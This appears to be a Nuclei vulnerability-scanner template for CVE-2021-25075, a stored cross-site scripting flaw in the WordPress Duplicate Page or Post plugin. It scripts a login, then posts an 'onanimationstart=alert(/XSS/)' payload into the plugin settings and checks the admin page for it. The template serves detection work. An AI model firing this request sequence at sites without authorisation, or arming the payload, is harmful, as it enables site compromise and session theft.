71 lines
2.9 KiB
YAML
71 lines
2.9 KiB
YAML
id: CVE-2021-25075
|
|
|
|
info:
|
|
name: WordPress Duplicate Page or Post <1.5.1 - Cross-Site Scripting
|
|
author: DhiyaneshDK
|
|
severity: low
|
|
description: |
|
|
WordPress Duplicate Page or Post plugin before 1.5.1 contains a stored cross-site scripting vulnerability. The plugin does not have any authorization and has a flawed cross-site request forgery check in the wpdevart_duplicate_post_parametrs_save_in_db AJAX action, allowing unauthenticated users to call it and change the plugin's settings, or perform such attack via cross-site request forgery.
|
|
impact: |
|
|
Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website.
|
|
remediation: Fixed in version 1.5.1.
|
|
reference:
|
|
- https://wpscan.com/vulnerability/db5a0431-af4d-45b7-be4e-36b6c90a601b
|
|
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-25075
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2021-25075
|
|
- https://github.com/ARPSyndicate/kenzer-templates
|
|
- https://github.com/kazet/wpgarlic
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N
|
|
cvss-score: 3.5
|
|
cve-id: CVE-2021-25075
|
|
cwe-id: CWE-862
|
|
epss-score: 0.00071
|
|
epss-percentile: 0.30442
|
|
cpe: cpe:2.3:a:wpdevart:duplicate_page_or_post:*:*:*:*:*:wordpress:*:*
|
|
metadata:
|
|
max-request: 3
|
|
vendor: wpdevart
|
|
product: duplicate_page_or_post
|
|
framework: wordpress
|
|
tags: cve2021,cve,wpscan,wordpress,xss,wp-plugin,authenticated,wpdevart
|
|
|
|
http:
|
|
- raw:
|
|
- |
|
|
POST /wp-login.php HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Origin: {{RootURL}}
|
|
Content-Type: application/x-www-form-urlencoded
|
|
Cookie: wordpress_test_cookie=WP%20Cookie%20check
|
|
|
|
log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
|
|
- |
|
|
POST /wp-admin/admin-ajax.php?action=wprss_fetch_items_row_action HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Content-Type: application/x-www-form-urlencoded
|
|
Cookie: wordpress_test_cookie=WP%20Cookie%20check
|
|
|
|
action=wpdevart_duplicate_post_parametrs_save_in_db&title_prefix=%22+style%3Danimation-name%3Arotation+onanimationstart%3Dalert%28%2fXSS%2f%29+p
|
|
- |
|
|
GET /wp-admin/admin.php?page=wpda_duplicate_post_menu HTTP/1.1
|
|
Host: {{Hostname}}
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: body
|
|
words:
|
|
- "style=animation-name:rotation onanimationstart=alert(/XSS/) p"
|
|
- "toplevel_page_wpda_duplicate_post_menu"
|
|
condition: and
|
|
|
|
- type: word
|
|
part: header
|
|
words:
|
|
- text/html
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
# digest: 490a00463044022077f210250f3482bba71ed34537c591cdac0a7d3c0ac9e2d84956ae5c8df4d5430220071507b63b43298b7af76742ac5962469b6912baa0b527ac7794bd18a2ebf931:922c64590222798bb761d5b6d8e72950 |